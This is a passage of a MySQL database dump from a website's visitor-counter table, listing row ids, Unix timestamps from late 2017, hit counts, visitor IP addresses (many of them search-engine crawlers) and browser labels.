0,1,0,'66.249.64.28',''),(182953,1511979719,1,0,1,0,'66.249.70.27',''),(182954,1511979833,1,1,0,0,'91.196.178.68','chrome'),(182955,1511980123,1,1,0,0,'217.182.132.81','other'),(182956,1511980186,1,1,0,0,'51.255.65.33','other'),(182957,1511980195,1,1,0,0,'8.29.198.25','other'),(182958,1511980288,1,1,0,0,'37.229.59.9','firefox'),(182959,1511980671,1,1,0,0,'51.255.71.133','other'),(182960,1511981083,1,0,1,0,'66.249.70.27',''),(182961,1511981265,2,0,2,0,'66.249.64.30',''),(182962,1511981350,1,1,0,0,'51.255.71.112','other'),(182963,1511981377,1,1,0,0,'91.196.178.10','chrome'),(182964,1511982003,1,1,0,0,'51.255.71.128','other'),(182965,1511982032,1,0,1,0,'66.249.64.28',''),(182966,1511982451,1,1,0,0,'51.255.65.83','other'),(182967,1511982773,1,1,0,0,'162.210.196.130','other'),(182968,1511982958,1,1,0,0,'216.244.66.237','other'),(182969,1511982968,1,1,0,0,'141.8.142.74','other'),(182970,1511983668,1,1,0,0,'91.196.178.10','chrome'),(182971,1511983888,1,1,0,0,'51.255.65.53','other'),(182972,1511984090,1,1,0,0,'164.132.162.153','other'),(182973,1511984537,1,1,0,0,'178.154.171.88','other'),(182974,1511984808,1,1,0,0,'66.249.64.29','chrome'),(182975,1511985243,1,1,0,0,'137.74.207.102','other'),(182976,1511985318,1,1,0,0,'217.182.132.150','other'),(182977,1511985383,1,1,0,0,'51.255.65.68','other'),(182978,1511985653,1,1,0,0,'51.255.65.38','other'),(182979,1511985848,1,1,0,0,'51.255.65.92','other'),(182980,1511986018,1,0,1,0,'66.249.70.27',''),(182981,1511986188,1,1,0,0,'51.255.65.22','other'),(182982,1511986444,1,1,0,0,'217.182.132.187','other'),(182983,1511987210,1,1,0,0,'51.255.71.112','other'),(182984,1511987464,1,1,0,0,'141.8.142.74','other'),(182985,1511987821,1,1,0,0,'207.46.13.143','other'),(182986,1511988109,1,1,0,0,'130.180.210.216','chrome'),(182987,1511988240,1,1,0,0,'51.255.65.32','other'),(182988,1511988567,2,2,0,0,'51.255.71.111','other'),(182989,1511988573,1,0,1,0,'66.249.70.29',''),(182990,1511988975,1,1,0,0,'217.182.132.7','other'),(182991,1511989291,1,1,0,0,'51.255.65.68','other'),(182992,1511989690,1,1,0,0,'51.255.65.57','other'),(182993,1511989751,1,1,0,0,'217.182.132.28','other'),(182994,1511990104,1,1,0,0,'217.182.132.23','other'),(182995,1511990634,1,1,0,0,'51.255.65.94','other'),(182996,1511990955,1,1,0,0,'217.182.132.16','other'),(182997,1511991029,1,1,0,0,'8.29.198.26','other'),(182998,1511991031,1,1,0,0,'51.255.65.45','other'),(182999,1511991109,1,1,0,0,'216.244.66.237','other'),(183000,1511991367,1,1,0,0,'91.196.178.161','chrome'),(183001,1511991821,1,1,0,0,'51.255.65.40','other'),(183002,1511991955,1,1,0,0,'94.76.113.212','chrome'),(183003,1511992352,1,1,0,0,'141.8.142.74','other'),(183004,1511992401,1,1,0,0,'130.180.208.192','chrome'),(183005,1511992406,1,1,0,0,'137.74.201.100','other'),(183006,1511992767,1,1,0,0,'217.182.132.87','other'),(183007,1511992850,1,1,0,0,'51.255.71.115','other'),(183008,1511993078,1,1,0,0,'178.154.171.88','other'),(183009,1511993329,1,1,0,0,'51.255.71.122','other'),(183010,1511993518,1,1,0,0,'51.255.65.81','other'),(183011,1511993590,1,1,0,0,'141.8.142.74','other'),(183012,1511993616,1,0,1,0,'68.180.229.52',''),(183013,1511994188,1,1,0,0,'51.255.71.128','other'),(183014,1511994195,2,2,0,0,'217.182.132.51','other'),(183015,1511994425,1,1,0,0,'51.255.65.83','other'),(183016,1511994910,1,1,0,0,'141.8.142.74','other'),(183017,1511994956,1,1,0,0,'217.182.132.6','other'),(183018,1511995176,1,1,0,0,'46.219.238.13','chrome'),(183019,1511995454,1,1,0,0,'217.182.132.54','other'),(183020,1511995492,1,1,0,0,'51.255.65.27','other'),(183021,1511995496,1,1,0,0,'51.255.71.116','other'),(183022,1511995527,1,1,0,0,'51.255.65.87','other'),(183023,1511995543,1,1,0,0,'51.255.65.58','other'),(183024,1511995602,1,1,0,0,'137.74.207.114','other'),(183025,1511995654,1,1,0,0,'51.255.65.28','other'),(183026,1511995680,1,1,0,0,'217.182.132.82','other'),(183027,1511996824,1,1,0,0,'51.255.65.62','other'),(183028,1511997026,1,1,0,0,'51.255.65.94','other'),(183029,1511997360,1,1,0,0,'217.182.132.20','other'),(183030,1511997473,1,1,0,0,'217.182.132.75','other'),(183031,1511997661,1,1,0,0,'217.182.132.157','other'),(183032,1511998010,1,0,1,0,'66.249.64.30',''),(183033,1511998303,1,1,0,0,'51.255.65.40','other'),(183034,1511998484,1,1,0,0,'137.74.201.100','other'),(183035,1511999616,1,1,0,0,'51.255.71.128','other'),(183036,1511999689,1,1,0,0,'217.182.132.56','other'),(183037,1511999915,1,1,0,0,'217.182.132.75','other'),(183038,1511999994,1,1,0,0,'51.255.65.37','other'),(183039,1512000751,1,1,0,0,'137.74.207.101','other'),(183040,1512001166,1,1,0,0,'141.8.142.74','other'),(183041,1512001237,1,1,0,0,'217.182.132.61','other'),(183042,1512001240,1,1,0,0,'51.255.65.74','other'),(183043,1512001248,1,0,1,0,'66.249.64.28',''),(183044,1512001567,1,1,0,0,'217.182.132.186','other'),(183045,1512001757,1,1,0,0,'91.196.178.37','chrome'),(183046,1512001858,1,1,0,0,'8.29.198.26','other'),(183047,1512002442,1,1,0,0,'51.255.65.73','other'),(183048,1512002562,1,1,0,0,'51.255.65.72','other'),(183049,1512002635,1,1,0,0,'51.255.65.48','other'),(183050,1512003217,1,1,0,0,'141.8.142.74','other'),(183051,1512003273,1,1,0,0,'217.182.132.30','other'),(183052,1512003686,1,1,0,0,'217.182.132.87','other'),(183053,1512003766,1,1,0,0,'51.255.71.98','other'),(183054,1512004420,1,1,0,0,'217.182.132.7','other'),(183055,1512004673,1,1,0,0,'217.182.132.4','other'),(183056,1512004791,1,1,0,0,'141.8.142.74','other'),(183057,1512005108,1,1,0,0,'217.182.132.187','other'),(183058,1512005282,1,1,0,0,'51.255.65.69','other'),(183059,1512005555,1,1,0,0,'217.182.132.86','other'),(183060,1512005606,1,1,0,0,'51.255.71.119','other'),(183061,1512005802,1,1,0,0,'217.182.132.51','other'),(183062,1512005877,1,1,0,0,'180.76.15.142','other'),(183063,1512006799,1,1,0,0,'51.255.65.41','other'),(183064,1512006966,1,1,0,0,'51.255.65.59','other'),(183065,1512007115,1,1,0,0,'51.255.65.33','other'),(183066,1512007611,1,1,0,0,'51.255.64.106','other'),(183067,1512007977,1,1,0,0,'85.195.116.66','chrome'),(183068,1512008009,1,1,0,0,'217.182.132.172','other'),(183069,1512008043,1,1,0,0,'51.255.65.74','other'),(183070,1512009267,1,1,0,0,'217.182.132.150','other'),(183071,1512009771,1,1,0,0,'164.132.164.180','other'),(183072,1512009846,1,1,0,0,'164.132.162.153','other'),(183073,1512010055,1,0,1,0,'66.249.70.25',''),(183074,1512010503,1,1,0,0,'91.196.178.37','chrome'),(183075,1512010593,1,1,0,0,'51.255.65.32','other'),(183076,1512010685,1,1,0,0,'54.165.59.7','other'),(183077,1512012211,1,1,0,0,'51.255.65.47','other'),(183078,1512012690,1,1,0,0,'8.29.198.26','other'),(183079,1512012896,1,0,1,0,'66.249.70.27',''),(183080,1512013065,1,1,0,0,'178.154.171.88','other'),(183081,1512013186,1,1,0,0,'51.255.71.121','other'),(183082,1512013553,1,1,0,0,'85.195.116.66','chrome'),(183083,1512013713,1,1,0,0,'141.8.142.74','other'),(183084,1512014218,1,1,0,0,'51.255.65.28','other'),(183085,1512014895,1,1,0,0,'51.255.71.98','other'),(183086,1512014942,1,1,0,0,'51.255.65.70','other'),(183087,1512015071,9,9,0,0,'80.241.214.124','other'),(183088,1512015314,1,1,0,0,'51.255.71.127','other'),(183089,1512015603,1,1,0,0,'40.77.167.15','other'),(183090,1512015622,1,1,0,0,'51.255.71.100','other'),(183091,1512015752,1,1,0,0,'217.182.132.77','other'),(183092,1512015866,1,1,0,0,'51.255.65.88','other'),(183093,1512015974,1,0,1,0,'66.249.64.29',''),(183094,1512016160,1,1,0,0,'164.132.164.180','other'),(183095,1512016211,1,1,0,0,'217.182.132.56','other'),(183096,1512016371,1,0,1,0,'66.249.70.27',''),(183097,1512016442,1,1,0,0,'217.182.132.61','other'),(183098,1512016537,1,1,0,0,'51.255.65.86','other'),(183099,1512016687,1,1,0,0,'217.182.132.50','other'),(183100,1512016717,1,1,0,0,'217.182.132.60','other'),(183101,1512016780,1,1,0,0,'217.69.133.224','other'),(183102,1512017243,1,1,0,0,'217.182.132.183','other'),(183103,1512017608,1,1,0,0,'51.255.71.131','other'),(183104,1512017640,1,1,0,0,'217.182.132.146','other'),(183105,1512017805,1,1,0,0,'217.182.132.93','other'),(183106,1512017911,1,1,0,0,'141.8.142.74','other'),(183107,1512018914,1,1,0,0,'217.182.132.82','other'),(183108,1512019569,1,1,0,0,'217.182.132.193','other'),(183109,1512019943,1,0,1,0,'68.180.229.52',''),(183110,1512019991,1,1,0,0,'91.200.12.196','chrome'),(183111,1512020670,1,1,0,0,'217.182.132.37','other'),(183112,1512021259,1,1,0,0,'217.182.132.75','other'),(183113,1512021415,1,1,0,0,'51.255.65.92','other'),(183114,1512021426,1,1,0,0,'137.74.201.99','other'),(183115,1512021902,1,1,0,0,'66.249.64.30','chrome'),(183116,1512021910,1,1,0,0,'51.255.65.62','other'),(183117,1512021938,1,1,0,0,'217.182.132.150','other'),(183118,1512022189,1,1,0,0,'51.255.65.86','other'),(183119,1512022581,1,1,0,0,'51.255.65.25','other'),(183120,1512023366,1,1,0,0,'51.255.65.50','other'),(183121,1512023527,1,1,0,0,'8.29.198.26','other'),(183122,1512023646,1,0,1,0,'66.249.70.27',''),(183123,1512023648,1,1,0,0,'51.255.71.114','other'),(183125,1512023710,1,0,1,0,'66.249.64.30',''),(183126,1512024023,1,1,0,0,'37.52.17.192','chrome'),(183127,1512024905,1,1,0,0,'141.8.142.74','other'),(183128,1512025895,1,1,0,0,'91.196.178.167','chrome'),(183129,1512026142,1,1,0,0,'51.255.71.101','other'),(183130,1512026621,1,1,0,0,'91.196.178.69','chrome'),(183131,1512026686,2,2,0,0,'217.182.132.51','other'),(183132,1512026759,1,1,0,0,'217.182.132.32','other'),(183133,1512026941,1,1,0,0,'91.196.178.70','chrome'),(183134,1512027197,1,1,0,0,'217.182.132.82','other'),(183135,1512027277,1,1,0,0,'51.255.65.74','other'),(183136,1512027286,1,1,0,0,'37.52.126.20','chrome'),(183137,1512027395,1,1,0,0,'51.255.65.95','other'),(183138,1512027449,1,1,0,0,'217.182.132.178','other'),(183139,1512027509,1,1,0,0,'198.37.118.36','firefox'),(183140,1512027521,1,1,0,0,'51.255.65.12','other'),(183141,1512027593,1,0,1,0,'66.249.64.28',''),(183142,1512027887,1,1,0,0,'164.132.164.180','other'),(183143,1512028163,1,1,0,0,'51.255.65.47','other'),(183144,1512028216,1,1,0,0,'207.46.13.143','other'),(183145,1512028400,1,1,0,0,'141.8.142.74','other'),(183146,1512028486,2,2,0,0,'195.10.210.70','chrome'),(183147,1512028531,1,1,0,0,'91.196.178.70','chrome'),(183148,1512028655,1,0,1,0,'66.249.64.30',''),(183149,1512028979,1,1,0,0,'51.255.65.51','other'),(183150,1512029434,1,1,0,0,'91.196.178.70','chrome'),(183151,1512029599,1,1,0,0,'91.196.178.70','firefox'),(183152,1512030323,1,1,0,0,'51.255.71.127','other'),(183153,1512030346,1,1,0,0,'51.255.65.45','other'),(183154,1512030643,1,1,0,0,'217.182.132.78','other'),(183155,1512030713,1,1,0,0,'91.196.178.70','chrome'),(183156,1512030796,6,6,0,0,'86.165.24.238','other'),(183157,1512030892,1,1,0,0,'91.196.178.70','firefox'),(183158,1512031026,1,1,0,0,'51.255.65.72','other'),(183159,1512031302,1,1,0,0,'51.255.65.85','other'),(183160,1512032109,1,1,0,0,'217.182.132.24','other'),(183161,1512032222,1,1,0,0,'164.132.162.160','other'),(183162,1512032469,1,1,0,0,'188.166.48.212','chrome'),(183163,1512033222,1,1,0,0,'217.182.132.50','other'),(183164,1512034122,1,1,0,0,'217.182.132.7','other'),(183165,1512034225,1,1,0,0,'217.182.132.184','other'),(183166,1512034357,1,1,0,0,'8.29.198.26','other'),(183167,1512034394,1,1,0,0,'94.178.125.183','chrome'),(183168,1512035245,1,1,0,0,'91.209.11.236','other'),(183169,1512035329,1,1,0,0,'195.10.210.70','chrome'),(183170,1512035595,1,1,0,0,'51.255.65.42','other'),(183171,1512035926,1,0,1,0,'66.249.64.28',''),(183172,1512035970,1,1,0,0,'216.144.232.5','other'),(183173,1512035981,1,1,0,0,'91.196.178.133','firefox'),(183174,1512036131,1,1,0,0,'91.196.178.165','chrome'),(183175,1512036178,1,1,0,0,'82.207.91.234','other'),(183176,1512036874,1,1,0,0,'51.255.65.58','other'),(183177,1512036883,1,1,0,0,'194.44.41.124','chrome'),(183178,1512037031,1,1,0,0,'91.209.11.236','other'),(183179,1512037150,1,1,0,0,'91.196.178.70','chrome'),(183180,1512037201,1,1,0,0,'51.255.65.22','other'),(183181,1512037221,1,1,0,0,'51.255.71.113','other'),(183182,1512038040,1,1,0,0,'213.5.193.153','chrome'),(183183,1512038081,1,1,0,0,'51.255.65.61','other'),(183184,1512038401,1,1,0,0,'178.154.171.88','other'),(183185,1512038513,1,0,1,0,'66.249.64.30',''),(183186,1512038619,1,1,0,0,'91.196.178.133','chrome'),(183187,1512038694,1,1,0,0,'130.180.212.121','chrome'),(183188,1512038899,1,1,0,0,'91.209.11.236','other'),(183189,1512040229,1,1,0,0,'178.154.171.88','other'),(183190,1512040577,1,1,0,0,'217.182.132.6','other'),(183191,1512041363,1,1,0,0,'217.182.132.56','other'),(183192,1512041395,1,1,0,0,'51.255.65.15','other'),(183193,1512041536,1,1,0,0,'217.182.132.68','other'),(183194,1512041988,1,1,0,0,'217.182.132.75','other'),(183195,1512042121,1,1,0,0,'217.182.132.35','other'),(183196,1512042138,1,1,0,0,'180.76.15.156','other'),(183197,1512042382,1,1,0,0,'217.182.132.76','other'),(183198,1512042983,1,1,0,0,'217.69.134.174','other'),(183199,1512043128,1,1,0,0,'51.255.65.28','other'),(183200,1512043304,1,1,0,0,'37.204.58.171','chrome'),(183201,1512043789,1,1,0,0,'85.195.116.66','firefox'),(183202,1512043925,1,1,0,0,'91.209.11.236','other'),(183203,1512044373,1,1,0,0,'91.201.246.90','chrome'),(183204,1512044604,1,1,0,0,'91.196.177.46','firefox'),(183205,1512044922,1,1,0,0,'217.182.132.72','other'),(183206,1512045031,1,1,0,0,'51.255.65.24','other'),(183207,1512045201,1,1,0,0,'217.182.132.180','other'),(183208,1512045203,1,1,0,0,'8.29.198.26','other'),(183209,1512045355,1,1,0,0,'51.255.65.40','other'),(183210,1512045472,1,1,0,0,'37.9.113.132','other'),(183211,1512045720,2,2,0,0,'91.209.11.236','other'),(183212,1512046201,1,1,0,0,'91.196.178.165','chrome'),(183213,1512046354,1,1,0,0,'217.182.132.77','other'),(183214,1512046440,1,1,0,0,'207.46.13.143','other'),(183215,1512046575,1,1,0,0,'91.196.178.69','firefox'),(183216,1512046717,1,1,0,0,'213.169.71.33','chrome'),(183217,1512046750,1,1,0,0,'51.255.65.76','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (183218,1512047042,1,1,0,0,'92.113.47.220','chrome'),(183219,1512047105,1,1,0,0,'81.162.233.97','firefox'),(183220,1512047858,1,1,0,0,'91.197.220.240','chrome'),(183221,1512047896,1,1,0,0,'217.182.132.177','other'),(183222,1512047921,1,1,0,0,'216.244.66.237','other'),(183223,1512048123,1,1,0,0,'217.182.132.190','other'),(183224,1512048198,1,1,0,0,'91.196.150.144','chrome'),(183225,1512048250,1,1,0,0,'164.132.162.158','other'),(183226,1512048349,1,1,0,0,'207.46.13.114','other'),(183227,1512048513,1,1,0,0,'217.182.132.97','other'),(183228,1512048656,1,1,0,0,'164.132.162.187','other'),(183229,1512048896,1,1,0,0,'46.200.115.170','firefox'),(183230,1512048965,1,1,0,0,'217.182.132.241','other'),(183231,1512049022,2,2,0,0,'91.209.11.236','other'),(183232,1512049040,1,1,0,0,'51.255.65.56','other'),(183233,1512049803,1,1,0,0,'217.182.132.20','other'),(183235,1512049980,1,1,0,0,'217.182.132.37','other'),(183236,1512050310,1,1,0,0,'91.209.11.236','other'),(183237,1512050718,1,1,0,0,'87.250.224.46','other'),(183238,1512051240,1,1,0,0,'91.209.11.236','other'),(183239,1512051304,1,1,0,0,'51.255.65.17','other'),(183240,1512051371,1,1,0,0,'51.255.65.30','other'),(183241,1512051779,1,1,0,0,'51.255.71.132','other'),(183242,1512051788,1,1,0,0,'217.182.132.149','other'),(183243,1512051905,1,1,0,0,'85.195.116.66','firefox'),(183244,1512052479,1,1,0,0,'91.222.155.188','chrome'),(183245,1512052991,1,1,0,0,'164.132.162.187','other'),(183246,1512053040,1,1,0,0,'91.196.178.70','chrome'),(183247,1512053474,1,1,0,0,'91.209.11.236','other'),(183248,1512053483,1,1,0,0,'91.196.177.46','firefox'),(183249,1512053485,1,1,0,0,'217.182.132.67','other'),(183250,1512053566,1,1,0,0,'91.196.178.67','firefox'),(183251,1512054150,1,1,0,0,'217.182.132.68','other'),(183252,1512054305,1,1,0,0,'51.255.65.30','other'),(183253,1512054680,1,1,0,0,'141.8.142.74','other'),(183254,1512054687,1,1,0,0,'207.46.13.143','other'),(183255,1512054846,1,1,0,0,'178.154.171.88','other'),(183256,1512054933,1,1,0,0,'217.182.132.67','other'),(183257,1512055431,1,1,0,0,'51.255.65.19','other'),(183258,1512055505,1,0,1,0,'66.249.64.29',''),(183259,1512055612,1,1,0,0,'141.8.142.74','other'),(183260,1512056043,1,1,0,0,'8.29.198.25','other'),(183261,1512056194,1,1,0,0,'91.209.11.236','other'),(183262,1512056246,1,1,0,0,'162.210.196.98','other'),(183263,1512056321,1,1,0,0,'137.74.207.188','other'),(183264,1512056672,1,1,0,0,'217.182.132.172','other'),(183265,1512057874,1,0,1,0,'68.180.229.52',''),(183266,1512058568,1,1,0,0,'51.255.65.22','other'),(183267,1512058651,1,0,1,0,'66.249.64.30',''),(183268,1512058962,1,1,0,0,'151.80.27.118','other'),(183269,1512059055,1,1,0,0,'216.244.66.237','other'),(183270,1512059299,4,4,0,0,'141.8.142.74','other'),(183271,1512059337,1,1,0,0,'37.9.113.101','other'),(183272,1512059749,1,1,0,0,'217.182.132.176','other'),(183273,1512060232,46,0,46,0,'68.180.229.104',''),(183274,1512060254,1,1,0,0,'217.182.132.181','other'),(183275,1512060457,1,1,0,0,'216.244.66.237','other'),(183276,1512060836,1,1,0,0,'40.77.167.3','other'),(183277,1512061180,6,0,6,0,'68.180.229.104',''),(183278,1512061286,1,1,0,0,'137.74.207.161','other'),(183279,1512061557,1,1,0,0,'151.80.27.118','other'),(183280,1512061562,1,1,0,0,'178.154.171.88','other'),(183281,1512061643,1,1,0,0,'217.182.132.78','other'),(183282,1512061808,1,1,0,0,'51.255.71.122','other'),(183283,1512061896,1,1,0,0,'51.255.65.61','other'),(183284,1512061984,1,1,0,0,'51.255.65.81','other'),(183285,1512061992,1,1,0,0,'216.244.66.237','other'),(183286,1512062938,1,1,0,0,'217.182.132.87','other'),(183287,1512063026,1,1,0,0,'51.255.65.95','other'),(183288,1512063516,1,1,0,0,'188.32.255.19','chrome'),(183289,1512063845,1,1,0,0,'51.255.65.25','other'),(183290,1512064018,1,1,0,0,'51.255.65.71','other'),(183291,1512064592,1,1,0,0,'91.196.177.46','firefox'),(183292,1512064711,1,0,1,0,'68.180.229.104',''),(183293,1512064897,1,1,0,0,'51.255.65.49','other'),(183294,1512065230,1,1,0,0,'217.182.132.193','other'),(183295,1512065472,1,1,0,0,'40.77.167.124','other'),(183296,1512065642,1,1,0,0,'51.255.65.91','other'),(183297,1512065647,1,1,0,0,'37.9.113.110','other'),(183298,1512065693,1,1,0,0,'213.180.203.40','other'),(183299,1512065697,1,1,0,0,'5.45.207.83','other'),(183300,1512065713,1,1,0,0,'217.182.132.23','other'),(183301,1512066432,1,1,0,0,'51.255.65.80','other'),(183302,1512066703,1,1,0,0,'217.182.132.73','other'),(183303,1512066888,1,1,0,0,'8.29.198.27','other'),(183304,1512067109,1,1,0,0,'217.182.132.241','other'),(183305,1512067254,1,1,0,0,'207.46.13.114','other'),(183306,1512067474,1,1,0,0,'178.154.171.88','other'),(183307,1512067512,1,1,0,0,'91.196.178.18','chrome'),(183308,1512068525,1,1,0,0,'51.255.65.51','other'),(183309,1512068569,1,1,0,0,'216.244.66.237','other'),(183310,1512068762,1,1,0,0,'217.182.132.173','other'),(183311,1512069019,1,1,0,0,'137.74.207.161','other'),(183312,1512069761,1,0,1,0,'66.249.64.29',''),(183313,1512069795,1,1,0,0,'51.255.65.75','other'),(183314,1512069844,1,1,0,0,'217.182.132.173','other'),(183315,1512070233,1,1,0,0,'216.244.66.237','other'),(183316,1512070453,1,1,0,0,'51.255.65.97','other'),(183317,1512070522,1,1,0,0,'66.249.93.89','chrome'),(183318,1512070697,1,1,0,0,'164.132.162.156','other'),(183319,1512070800,1,1,0,0,'180.76.15.22','other'),(183320,1512070842,1,1,0,0,'217.182.132.182','other'),(183321,1512070893,1,1,0,0,'217.182.132.240','other'),(183322,1512071216,1,1,0,0,'217.182.132.57','other'),(183323,1512071453,1,1,0,0,'91.209.11.236','other'),(183324,1512071590,1,1,0,0,'216.244.66.237','other'),(183325,1512071675,1,1,0,0,'178.17.170.156','chrome'),(183326,1512071842,1,1,0,0,'137.74.207.101','other'),(183327,1512072170,1,0,1,0,'66.249.64.30',''),(183328,1512072318,1,1,0,0,'137.74.201.99','other'),(183329,1512072655,1,1,0,0,'51.255.65.45','other'),(183330,1512073025,1,1,0,0,'51.255.71.113','other'),(183331,1512073146,1,1,0,0,'217.182.132.62','other'),(183332,1512073170,1,1,0,0,'207.46.13.143','other'),(183333,1512073203,1,1,0,0,'216.244.66.237','other'),(183334,1512073476,1,1,0,0,'217.182.132.150','other'),(183335,1512073551,1,1,0,0,'40.77.167.3','other'),(183336,1512073653,1,0,1,0,'68.180.229.104',''),(183337,1512074224,1,1,0,0,'51.255.71.120','other'),(183338,1512074284,1,0,1,0,'66.249.64.30',''),(183339,1512074331,1,1,0,0,'51.255.65.60','other'),(183340,1512074777,1,1,0,0,'51.255.65.20','other'),(183341,1512074820,1,1,0,0,'212.92.176.203','chrome'),(183342,1512074894,1,1,0,0,'51.255.65.32','other'),(183343,1512074916,1,1,0,0,'216.244.66.237','other'),(183344,1512075080,1,1,0,0,'91.209.11.236','other'),(183345,1512075393,1,1,0,0,'66.249.70.25','chrome'),(183346,1512075428,2,1,1,0,'66.249.64.28',''),(183347,1512075890,1,1,0,0,'178.95.156.151','chrome'),(183348,1512076529,1,1,0,0,'51.255.65.49','other'),(183349,1512076675,1,1,0,0,'91.209.11.236','other'),(183350,1512077001,1,1,0,0,'137.74.207.102','other'),(183351,1512077097,1,1,0,0,'217.182.132.7','other'),(183352,1512077369,1,1,0,0,'217.182.132.96','other'),(183353,1512077728,1,1,0,0,'8.29.198.26','other'),(183354,1512077796,1,1,0,0,'216.244.66.237','other'),(183355,1512077980,1,1,0,0,'217.182.132.63','other'),(183356,1512078042,1,1,0,0,'51.255.65.83','other'),(183357,1512078357,1,1,0,0,'217.182.132.179','other'),(183358,1512078643,1,1,0,0,'91.209.11.236','other'),(183359,1512078963,1,1,0,0,'217.182.132.152','other'),(183360,1512079020,1,1,0,0,'51.255.65.67','other'),(183361,1512079165,1,1,0,0,'217.182.132.19','other'),(183362,1512079532,1,1,0,0,'51.255.65.75','other'),(183363,1512079572,1,1,0,0,'207.46.13.114','other'),(183364,1512079878,1,1,0,0,'207.46.13.143','other'),(183365,1512080270,1,1,0,0,'51.255.65.59','other'),(183366,1512080613,1,1,0,0,'91.209.11.236','other'),(183367,1512080710,1,1,0,0,'217.182.132.82','other'),(183368,1512081236,1,1,0,0,'164.132.162.158','other'),(183369,1512082573,3,3,0,0,'93.209.10.17','other'),(183370,1512082846,1,1,0,0,'217.182.132.58','other'),(183371,1512082930,1,0,1,0,'68.180.229.52',''),(183372,1512083012,1,0,1,0,'66.249.70.27',''),(183373,1512083091,1,1,0,0,'217.182.132.193','other'),(183374,1512083210,1,1,0,0,'217.182.132.51','other'),(183375,1512083288,1,1,0,0,'51.255.65.79','other'),(183376,1512083489,1,0,1,0,'66.249.64.28',''),(183377,1512083568,1,1,0,0,'217.182.132.75','other'),(183378,1512083935,1,1,0,0,'217.182.132.70','other'),(183379,1512084029,1,1,0,0,'217.182.132.20','other'),(183380,1512084435,1,1,0,0,'51.255.65.55','other'),(183381,1512084802,1,1,0,0,'37.9.113.182','other'),(183382,1512084830,1,1,0,0,'178.154.171.88','other'),(183383,1512084928,1,1,0,0,'51.255.71.131','other'),(183384,1512085157,1,1,0,0,'51.255.71.98','other'),(183385,1512086008,1,0,1,0,'66.249.64.30',''),(183386,1512086013,1,1,0,0,'180.76.15.137','other'),(183387,1512086427,1,1,0,0,'217.182.132.56','other'),(183388,1512086747,1,1,0,0,'51.255.65.78','other'),(183389,1512086785,1,1,0,0,'51.255.65.27','other'),(183390,1512086815,1,1,0,0,'51.255.71.120','other'),(183391,1512087096,1,1,0,0,'217.182.132.63','other'),(183392,1512087116,1,1,0,0,'216.244.66.237','other'),(183393,1512087721,1,1,0,0,'141.8.142.74','other'),(183394,1512087757,1,1,0,0,'217.182.132.30','other'),(183395,1512087969,1,1,0,0,'217.69.133.59','other'),(183396,1512088431,1,1,0,0,'51.255.65.85','other'),(183397,1512088563,1,1,0,0,'8.29.198.25','other'),(183398,1512088591,11,11,0,0,'144.76.38.73','other'),(183399,1512088601,1,1,0,0,'216.244.66.237','other'),(183400,1512088767,1,1,0,0,'51.255.65.66','other'),(183401,1512088879,1,0,1,0,'66.249.64.28',''),(183402,1512089061,1,1,0,0,'217.182.132.55','other'),(183403,1512089290,1,1,0,0,'217.182.132.146','other'),(183404,1512090330,1,1,0,0,'204.79.180.13','msie'),(183405,1512090403,1,1,0,0,'137.74.207.119','other'),(183406,1512090414,1,1,0,0,'217.182.132.7','other'),(183407,1512090462,1,1,0,0,'141.8.142.74','other'),(183408,1512090522,1,1,0,0,'217.182.132.240','other'),(183409,1512090542,1,1,0,0,'217.182.132.57','other'),(183410,1512091014,1,1,0,0,'217.69.133.239','other'),(183411,1512091363,1,1,0,0,'91.209.11.236','other'),(183412,1512091614,1,1,0,0,'51.255.65.30','other'),(183413,1512092307,1,0,1,0,'66.249.64.29',''),(183414,1512092419,1,1,0,0,'51.255.64.106','other'),(183415,1512092519,1,1,0,0,'217.182.132.56','other'),(183416,1512092591,1,1,0,0,'178.154.171.60','other'),(183417,1512092771,3,3,0,0,'78.158.11.226','other'),(183418,1512092851,1,1,0,0,'217.182.132.188','other'),(183419,1512092929,1,1,0,0,'217.182.132.23','other'),(183420,1512093365,1,0,1,0,'68.180.229.52',''),(183421,1512093484,1,1,0,0,'217.182.132.187','other'),(183422,1512094525,1,1,0,0,'51.255.71.128','other'),(183423,1512094910,1,1,0,0,'217.69.133.237','other'),(183424,1512094966,5,5,0,0,'82.196.0.180','other'),(183425,1512095472,1,1,0,0,'51.255.65.80','other'),(183426,1512095753,1,1,0,0,'66.249.64.28','chrome'),(183427,1512095911,1,1,0,0,'51.255.65.73','other'),(183428,1512095934,1,1,0,0,'180.76.15.22','other'),(183429,1512096444,1,1,0,0,'217.182.132.170','other'),(183430,1512096651,1,1,0,0,'51.255.65.97','other'),(183431,1512096837,2,2,0,0,'141.8.142.74','other'),(183432,1512096859,1,1,0,0,'51.255.65.19','other'),(183433,1512097089,1,1,0,0,'178.154.171.88','other'),(183434,1512097848,1,0,1,0,'66.249.64.30',''),(183435,1512098082,1,1,0,0,'51.255.65.62','other'),(183436,1512098314,1,1,0,0,'51.255.65.61','other'),(183437,1512098338,1,1,0,0,'51.255.71.127','other'),(183438,1512098591,1,1,0,0,'89.178.6.166','msie'),(183439,1512098609,1,1,0,0,'137.74.207.120','other'),(183440,1512098924,1,1,0,0,'217.182.132.56','other'),(183441,1512099093,1,1,0,0,'51.255.65.91','other'),(183442,1512099392,1,1,0,0,'8.29.198.27','other'),(183443,1512100005,1,1,0,0,'51.255.65.86','other'),(183444,1512100411,1,1,0,0,'217.182.132.34','other'),(183445,1512101130,1,1,0,0,'217.182.132.17','other'),(183446,1512101493,1,1,0,0,'141.8.142.74','other'),(183447,1512101555,1,1,0,0,'51.255.65.88','other'),(183448,1512101747,1,1,0,0,'217.182.132.67','other'),(183449,1512101816,1,0,1,0,'66.249.64.30',''),(183450,1512101831,1,1,0,0,'51.255.65.73','other'),(183451,1512101860,1,1,0,0,'178.17.174.198','chrome'),(183452,1512102181,1,1,0,0,'51.255.65.35','other'),(183453,1512102779,1,1,0,0,'51.255.71.120','other'),(183454,1512102857,1,0,1,0,'68.180.229.52',''),(183455,1512102921,1,1,0,0,'137.74.207.159','other'),(183456,1512103205,1,1,0,0,'51.255.71.133','other'),(183457,1512103672,1,1,0,0,'217.182.132.22','other'),(183458,1512104738,1,1,0,0,'51.255.65.24','other'),(183459,1512105730,1,1,0,0,'207.46.13.143','other'),(183460,1512106513,1,1,0,0,'217.182.132.84','other'),(183461,1512106577,1,1,0,0,'217.182.132.55','other'),(183462,1512107385,2,2,0,0,'46.4.32.75','other'),(183463,1512107924,1,1,0,0,'217.182.132.25','other'),(183464,1512108615,1,1,0,0,'85.195.116.66','chrome'),(183465,1512108784,1,1,0,0,'40.77.167.129','other'),(183466,1512108874,1,1,0,0,'164.132.162.164','other'),(183467,1512109057,1,1,0